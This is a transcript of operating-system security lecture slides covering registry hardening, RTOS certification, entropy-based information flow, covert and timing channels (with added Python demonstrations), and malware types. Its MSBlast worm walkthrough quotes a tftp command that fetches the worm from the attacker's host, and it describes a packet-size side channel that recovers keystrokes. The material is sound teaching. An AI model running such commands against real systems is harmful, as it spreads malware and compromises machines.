Transcript (posted 11-Nov-2020)
Page 1: INSE 6130 Operating System Security, users.encs.concordia.ca/.../lecture/lecture/handout10o.pdf

INSE 6130 Operating System Security

Odds and Ends

Prof. Lingyu Wang

Outline

- Registry Security
- Embedded and Real-Time OS Security
- Information Flow
- The Phantom Menace
- Review for Final Exam

Registry

What is the registry?

- Configuration data stored in a hierarchical database
- Replacement of .ini, .sys, and .com configuration files
- A tree with five root keys
  - HKEY_LOCAL_MACHINE: hardware/OS data of this computer
  - HKEY_CLASSES_ROOT: OLE and file-class association data
  - HKEY_CURRENT_USER: profile for the user logged on interactively
  - HKEY_USERS: active user profiles of non-remote users
  - HKEY_CURRENT_CONFIG: hardware profile
- Hives (trees rooted at the top): DEFAULT, SAM, SECURITY, SOFTWARE, and SYSTEM in C:\Windows\System32\Config, and ntuser.dat in C:\Documents and Settings\administrator

http://msdn.microsoft.com/en-us/library/windows/desktop/ms724871(v=vs.85).aspx

Registry Best Practice

- One incorrect edit to the registry can crash the operating system
- If you are not completely sure about what you are doing, then better don't do it
- Back up before you modify it
  - Use the backup utility (Accessories -> System Tools)
  - Export/import registry hives

Access Control on Registry

- What you can do in regedit ("can" does not mean you should)
  - Grant full control/ownership of a registry key
  - Assign (customized) permissions to a registry key to users or groups
  - Audit users'/groups' activity on a registry key
- Restricting accesses
  - Local accesses: you can only make it inconvenient
  - Remote accesses: shouldn't be given in most cases
  - Domain controllers have accesses

Registry Hacks for Hardening OS

- E.g., prevent NTLM password hashes
  - XP and Windows 2000 use Kerberos; the NTLM hash is there for backwards compatibility
  - NTLM hashes can be easily broken by RainbowCrack
  - HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    - Win2K: add NoLMHash = 1
    - XP: Value name: NoLMHash, Data type: REG_DWORD, Radix: Decimal, Value data: 1
- E.g., prevent (SYN) DoS attacks in W2k
  - The connection responses time out more quickly in the event of a SYN attack
  - HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services, key: SynAttackProtect, Value: 0, 1, 2 (default to best protection)


Where Are Embedded/Real-time OS?

- Bombardier Challenger 300: RTOS in the adaptive flight display systems
- US Army's Crusader: RTOS processes ballistic calculations, the graphical user interface and real-time equipment control systems
- F-35: RTOS powers a portion of the Panoramic Cockpit Display subsystem

http://www.lynuxworks.com/rtos/rtos-178.php

Why Are Such Systems Different?

- A time constraint on an operation MUST be met regardless of the system load
  - Not the case on our PCs
  - A good example: Anti-lock braking system (ABS)
- System reliability, availability, etc.
  - Availability = MTTF / (MTTF + MTTR), i.e., mean time to failure / (mean time to failure + mean time to recovery)

The Standard for RTOS

- DO-178B: "Software Considerations in Airborne Systems and Equipment Certification"
  - A de facto standard for certifying aviation software, such as RTOS
- Software systems are categorized by the effects of their failures
  - A: Catastrophic - Failure may cause a crash
  - B: Hazardous - Failure has a large negative impact on safety or performance, or reduces the ability of the crew to operate the plane
  - C: Major - Failure is significant, but has a lesser impact than a Hazardous failure (e.g., leads to passenger discomfort)
  - D: Minor - Failure is noticeable, but has a lesser impact than a Major failure (e.g., causing passenger inconvenience or a flight plan change)
  - E: No Effect - Failure has no impact on safety, aircraft operation, or crew workload
- The development process of a software is subject to different requirements based on its level

LynxOS-178 RTOS

- An RTOS certifiable to DO-178B level A
- Provides security through fixed partitions of resources (time and memory)
  - System events in one partition cannot interfere with events in another
  - E.g., CD player and ABS

Safety and Security

- Common Criteria (CC)
  - A standard (ISO/IEC 15408) for computer security
  - A framework for specifying security requirements and implementing/claiming and testing such requirements
- DO-178B and CC
  - Software developed to DO-178B Level A standards will map closely to either an EAL 4 or 5
  - CC basically requires a small kernel capable of controlling information flow and maintaining data isolation
  - DO-178B kernel space partitioning provides both
  - From DO-178B to EAL 7, mostly formal method

http://www.csds.uidaho.edu/comparison/stc2002.pdf


What We Already Know

- Information flows when
  - I write to slides (push)
  - You read slides (pull)
  - You read what I have written
- Information flow policy in BLP and Biba
  - BLP: flow up (e.g., unclassified to secret)
  - Biba: flow down (e.g., high integrity to low integrity)
  - Chinese Wall: flow inside a CD (except sanitized)
- Question: How do we model/measure "information flow"?

Answer: Entropy

H(X) = - Σ_i p(X = x_i) log2 p(X = x_i)

- Measures the uncertainty of X
- How many bits are required to represent X

Example

- X = 0 or 1, equally likely
  H(X) = - ( p(X=0) log2 p(X=0) + p(X=1) log2 p(X=1) )
       = - ( 1/2 log2 1/2 + 1/2 log2 1/2 ) = 1
- Y = 1 certainly; Y = 0 impossible
  H(Y) = - ( p(Y=1) log2 p(Y=1) ) = - 1 log2 1 = 0

The Intuition

Question: Do you need to know entropy in the final exam?

- Before today, no clue
  Answer: Yes 50%, No 50%; entropy 1
- Right now, likely
  Answer: Yes 60%, No 40%; entropy 0.97
- After the final exam...
  Answer: Yes 100% or 0%; entropy 0

Seeing slides, or the exam, decreases your uncertainty (entropy) about the question

- Information flows to you from slides (exam)
- More information flows to you from the exam than from the slides

Example 1

Suppose
- X can be either 0 or 1, equally likely
- So, H(X) = 1

If
- Value assignment Y := X (X: exam question; Y: my expression)

Then
- H(X|Y) = 0: knowing Y gives you X (looking at my expression gives you the exam question)

Value assignment causes information flow X → Y

What if c: value assignment Y := 1? (I am expressionless)

Example 2

Suppose
- 0 ≤ X ≤ 7, equally likely
- So, H(X) = -8 (1/8) log2 (1/8) = 3
- Z = 1, 2 or 3, equally likely

If
- Y := X + Z

Then
- Knowing Y, X can have at most 3 values
- H(X|Y) < -3 (1/3) log2 (1/3) = log2 3 < 3
- Information flows X → Y

Example 3

Suppose
- X equally likely to be either 0 or 1
- Y equally likely to be either true or false
- H(X) = 1, H(Y) = 1

If
- X > 0 ? Y := true : Y := false

Then
- H(X|Y) = 0
- Information flows X → Y

Implicit information flow: no direct value assignment between X and Y
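The three examples above can be checked mechanically: enumerate every equally likely input, run the assignment, and compute H(X|Y) from the joint distribution of (X, Y). The Python below is an added example (not from the lecture slides; the function names are my own) that does this for Y := X, Y := 1, Y := X + Z and the implicit flow X > 0 ? true : false, and for Example 2 it computes the exact H(X|Y) that the slide only bounds by log2 3.

```python
import math
from collections import Counter
from itertools import product


def entropy(dist):
    """Shannon entropy in bits of a distribution {outcome: probability}."""
    return -sum(p * math.log2(p) for p in dist.values() if p > 0)


def joint_distribution(x_values, z_values, program):
    """Run program(x, z) for every equally likely (x, z) pair and return the
    joint distribution of (X, Y), where Y is the program's output.  Z models
    any other independent, uniformly distributed input the program reads."""
    joint = Counter()
    weight = 1.0 / (len(x_values) * len(z_values))
    for x, z in product(x_values, z_values):
        joint[(x, program(x, z))] += weight
    return joint


def marginal(joint, index):
    """Marginal distribution of one coordinate (0 -> X, 1 -> Y) of a joint."""
    out = Counter()
    for pair, p in joint.items():
        out[pair[index]] += p
    return out


def conditional_entropy(joint):
    """H(X|Y) = H(X,Y) - H(Y): the uncertainty about X left once Y is known."""
    return entropy(joint) - entropy(marginal(joint, 1))


def information_flow(x_values, program, z_values=(None,)):
    """Return (H(X), H(X|Y), I(X;Y)) for the assignment Y := program(x, z).
    I(X;Y) = H(X) - H(X|Y) is the number of bits that flow from X into Y."""
    joint = joint_distribution(x_values, z_values, program)
    h_x = entropy(marginal(joint, 0))
    h_x_given_y = conditional_entropy(joint)
    return h_x, h_x_given_y, h_x - h_x_given_y


# Example 1: Y := X leaks all of X; Y := 1 leaks nothing.
def example1_copy():
    return information_flow([0, 1], lambda x, z: x)


def example1_constant():
    return information_flow([0, 1], lambda x, z: 1)


# Example 2: Y := X + Z, X uniform on 0..7, Z uniform on {1, 2, 3}.
def example2_sum():
    return information_flow(range(8), lambda x, z: x + z, z_values=[1, 2, 3])


# Example 3: no assignment from X to Y, only a branch on X (implicit flow).
def example3_implicit():
    return information_flow([0, 1], lambda x, z: x > 0)


if __name__ == "__main__":
    cases = [("Y := X", example1_copy), ("Y := 1", example1_constant),
             ("Y := X + Z", example2_sum),
             ("X > 0 ? Y := true : Y := false", example3_implicit)]
    for name, fn in cases:
        h_x, h_xy, flow = fn()
        print(f"{name:32s} H(X)={h_x:.3f}  H(X|Y)={h_xy:.3f}  flow={flow:.3f} bits")
```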

Confinement Problem

- Prevent leaking confidential information
- Easy: if processes only communicate via known communication channels

Isolation
- Virtual machines: OS runs on an emulated 'computer', restricted by the VM
- Sandboxing: a virtual machine for a process, instead of an OS

[Figure: VMware hosting Windows and Linux guests on top of hardware; JVM hosting an Applet on top of Windows on hardware]

Covert Channel

- Isolation only prevents direct communication via known channels
- A covert channel is a communication channel not intended for communication
  - Storage channel: shared storage-based
  - Timing channel: time-based

Example 1 – Storage Channel

- Processes p, q not allowed to communicate
- But they share a file system
- They set up a storage channel
  - Agree on two file names, /tmp001.txt and /tmp002.txt
  - If p wants to send q a bit 1, it creates the file /tmp001.txt; otherwise it creates /tmp002.txt
  - q records a bit based on the file name, and then deletes the file, so p can send the next bit

[Figure: p creates /tmp001.txt and q reads bit 1; p creates /tmp002.txt and q reads bit 0]

Example 2 – Timing Channel

Timing attack on cryptosystem

- Modular exponentiation algorithm (square and multiply)
- Computes x = a^z mod n, where z = z_0 ... z_(k-1)

  x := 1; atmp := a;
  for i := 0 to k-1 do begin
    if z_i = 1 then
      x := (x * atmp) mod n;
    atmp := (atmp * atmp) mod n;
  end
  result := x;

- Each 1 bit of z results in two multiplications
- Run time will be proportional to the number of 1 bits

Example 3 – Timing Channel

Two processes set up a timing channel

- To send a 0 bit: p relinquishes the CPU as soon as it gets the CPU
- To send a 1 bit: p uses the CPU for the full timing slot
- q determines a bit by seeing how quickly it gets the CPU

[Figure: timeline of p getting and relinquishing the CPU and q getting the CPU, labelled with the bits 1 and 0]

Noise/Mitigation of Covert Channel

- When many processes share the same resource, the covert channel will be noisy
  - Noise will reduce the capacity of a covert channel
  - But does not remove it (remember any communication channel is noisy)
- Mitigation of covert channel: obscure resource usage
  - Devote a uniform, fixed amount of resources to each process, even if some resources are wasted
    - Crypto example, CPU example (e.g., RTOS)
  - Inject randomness into allocation/use of resources
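To make the square-and-multiply timing channel of Example 2 and the "uniform, fixed amount of resources" mitigation concrete, here is an added Python example (not from the lecture slides; function names and the toy parameters a = 5, n = 97, k = 4 are my own) that counts modular multiplications, as a stand-in for running time, in the slide's right-to-left loop and in a variant that always performs the multiplication and discards the result for a 0 bit. The count is only a proxy: real constant-time code also needs branch-free selection, which this Python does not claim to provide.

```python
def popcount(z):
    """Number of 1 bits in z (the quantity the leaky loop's run time reveals)."""
    return bin(z).count("1")


def modexp_leaky(a, z, n, k):
    """Right-to-left square-and-multiply as on the slide, for a k-bit exponent
    z = z_0 ... z_(k-1) (z_0 least significant).  Returns
    (a^z mod n, number_of_modular_multiplications).  A 1 bit costs a multiply
    plus a square, a 0 bit only a square, so the count, and the running time
    it stands in for, is k + popcount(z) and reveals the weight of the secret z."""
    x, atmp, mults = 1, a % n, 0
    for i in range(k):
        if (z >> i) & 1:
            x = (x * atmp) % n
            mults += 1
        atmp = (atmp * atmp) % n
        mults += 1
    return x, mults


def modexp_uniform(a, z, n, k):
    """Square-and-multiply-always: the multiply is performed for every bit and
    its result is discarded when the bit is 0, so every k-bit exponent costs
    exactly 2*k multiplications.  This is the slide's 'uniform, fixed amount
    of resources, even if some are wasted' mitigation applied to the crypto
    example."""
    x, atmp, mults = 1, a % n, 0
    for i in range(k):
        candidate = (x * atmp) % n        # always computed, even for a 0 bit
        mults += 1
        if (z >> i) & 1:
            x = candidate                 # kept only for a 1 bit
        atmp = (atmp * atmp) % n
        mults += 1
    return x, mults


def cost_profile(a, n, k, variant):
    """Sorted set of distinct multiplication counts over all k-bit exponents.
    More than one value means the cost leaks information about the exponent."""
    counts = set()
    for z in range(1 << k):
        if variant == "leaky":
            counts.add(modexp_leaky(a, z, n, k)[1])
        else:
            counts.add(modexp_uniform(a, z, n, k)[1])
    return sorted(counts)


if __name__ == "__main__":
    a, n, k = 5, 97, 4                    # constructed toy parameters
    for z in (0b1000, 0b1011, 0b1111):
        r_leak, m_leak = modexp_leaky(a, z, n, k)
        r_uni, m_uni = modexp_uniform(a, z, n, k)
        assert r_leak == r_uni == pow(a, z, n)
        print(f"z={z:04b} ({popcount(z)} one bits)  leaky: {m_leak} mults"
              f"   uniform: {m_uni} mults")
    print("leaky cost set:  ", cost_profile(a, n, k, "leaky"))    # [4, 5, 6, 7, 8]
    print("uniform cost set:", cost_profile(a, n, k, "uniform"))  # [8]
```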

Make Positive Use of Covert Channel

Tracking anonymous P2P VOIP calls

[Figure: Alice and Bob connected through an anonymizing network; the connection between them is mixed with many others; headers modified, payload encrypted]

- Suppose we suspect Alice is talking to Bob
- How do we prove it?

Make Use of Covert Channel Cont'd

Track the call by transmitting a watermark through a timing channel based on inter-packet delays

[Figure: Alice to Bob; "Add Watermark: 1011" at one end and "Detect Watermark" at the other; a packet shifted by an inter-packet delay encodes Bit 1 or Bit 0]

Question: why do we always move packets to the right?

Web-based Application

[Figure: Client and Server connected over the Internet, exchanging encrypted traffic]

Advantages:
- Less client-side resources
- Easier to deliver and maintain

Characteristics:
- Low entropy inputs
- Rich & diverse resource objects
- Stateful communications

Side-Channel Attack

[Figure: Client and Server connected over the Internet, exchanging encrypted traffic; size and directions of packets between users and search engine]

- Fixed pattern: identified input string
- Indicator of input itself

User Input | Observed Directional Packet Sizes
a          | 801→, ←54, ←509, 60→
00         | 812→, ←54, ←505, 60→, 813→, ←54, ←507, 60→
(sizes labelled b-byte and s-byte in the figure)

Side-Channel Attack Cont'd

s value for each character entered as:

First keystroke:
a    b    c    d    e    f    g
509  504  502  516  499  504  502
h    i    j    k    l    m    n
509  492  517  499  501  503  488
o    p    q    r    s    t
509  525  494  498  488  494
u    v    w    x    y    z
503  522  516  491  502  501

Second keystroke:
     a    b    c    d    e
a    509  487  493  501  497
b    504  516  488  482  481
c    502  501  488  473  477
d    516  543  478  509  499

Unique s value: 12 out of 16; 16 out of 16

- In reality, it may take more than two keystrokes to uniquely identify an input string
- Leaks out users' private information: the input string


The Phantom Menace

[Figure: taxonomy of malicious programs, split into those that need a host program and those that are independent: Trapdoors, Logic Bombs, Trojan Horses, Viruses, Worms, Zombies, Rootkits]

Backdoor

- Secret entry point into a system
  - Special user identifier/password that circumvents normal security procedures
- Commonly used by developers
  - Could be included in a compiler (e.g., Ken Thompson)
- Example: Back Orifice (BO)
  - Win98, at DEFCON 6 in 1998; BO2k in 1999
  - BO server can be embedded in an executable file; when you run that file, BO silently installs itself as a 122K " .exe"
  - Run a BO client, scan the network for port 31337 (ELEET - elite), find any BO server: that machine is yours

Logic Bomb

- Embedded in legitimate programs
- Activated when specified conditions are met
  - E.g., presence/absence of some file; particular date/time or particular user
- When triggered, typically damages the system
  - Modify/delete files/disks
- Example: "CIA slipped bugs to Soviets"
  "In January 1982, President Ronald Reagan approved a CIA plan to sabotage the economy of the Soviet Union through covert transfers of technology that contained hidden malfunctions, including software that later triggered a huge explosion in a Siberian natural gas pipeline"

Rootkit

- A set of programs and code that allows a permanent or consistent, undetectable presence on a computer
  - Hide malicious resources, e.g., processes, files, registry keys, open ports, etc.
  - Provide hidden backdoor accesses
- Simple rootkits: modify user programs (ls, ps), detectable by tools like Tripwire
- Sophisticated rootkits: modify the kernel itself, hard to detect from userland

Worm

- Runs independently
  - Does not require a host program
- Propagates a fully working version of itself to other machines
- Carries a payload performing hidden tasks
  - Backdoors, spam relays, DDoS agents, ...
- Phases: Probing, Exploitation, Replication, Payload

Worm Propagation

[Figure: A Staged View of Worm Infection, from A Worm to A Victim: 1: Target Probing; 2: Vulnerability Exploitation; 3: Replication]

MSBlast Worm (Aug., 2003)

[Figure: Blaster (192.168.0.1) infecting Target/RPC (192.168.10.11)]
1. Exploits target on port 135/TCP
2. Binds svchost.exe to port 4444/TCP via injected code
3. Connects to target on port 4444/TCP
4. Creates a shell "cmd.exe" and binds it to port 4444/TCP
5. Creates "TFTP Server" on port 69/UDP
6. Sends "TFTP" command to shell; "teleports" msblast.exe file
   >tftp -I 192.168.0.1 GET msblast.exe
7. Runs TFTP command
8. Sends "START msblast.exe" command
9. Runs worm on target!
10. Closes connection
11. Shell closes

Botnet

- Zombie
  - A computer that secretly has a Trojan horse installed and can be used for attacks
  - Bots join a specific IRC channel on a server and wait for further commands
  - Attacker remotely controls the bot
- Botnet
  - A network of zombies controlled by a 'bot herder'
  - Consisting of several tens of thousands of bots
  - Usually for malicious purposes

Botnets Cont'd

Botnet is usually for profit
- Distributed Denial-of-Service (DDoS) Attacks
- Spamming – install SOCKS v4/v5 proxy for spam emails
- Sniffing traffic/key logging – e.g., credit card number
- Spreading new worms/viruses
- Ads add-ons, spyware, phishing
  - Paid for clicking ads (Google AdSense)
- Attacking IRC chat networks – Clone attack
- Manipulating online polls/games
- Mass identity theft

How Does Botnet Work (1)

[Figure: Attacker, Internet, Unsecured Computers] Step 1: Attacker scans the Internet for unsecured systems that can be compromised

How Does Botnet Work (2)

[Figure: Attacker, Internet, Unsecured Computers becoming Zombies] Step 2: Attacker secretly installs zombie agent programs, turning unsecured computers into zombies

How Does Botnet Work (3)

[Figure: Attacker, Internet, Zombies, Master Server] Step 3: Zombie agents ``phone home'' and connect to a master server

How Does Botnet Work (4)

[Figure: Attacker, Internet, Zombies, Master Server] Step 4: Attacker sends commands to the Master Server to launch a DDoS attack against a targeted system

How Does Botnet Work (5)

[Figure: Attacker, Internet, Zombies, Master Server, Targeted System] Step 5: Master Server sends a signal to the zombies to launch the attack on the targeted system
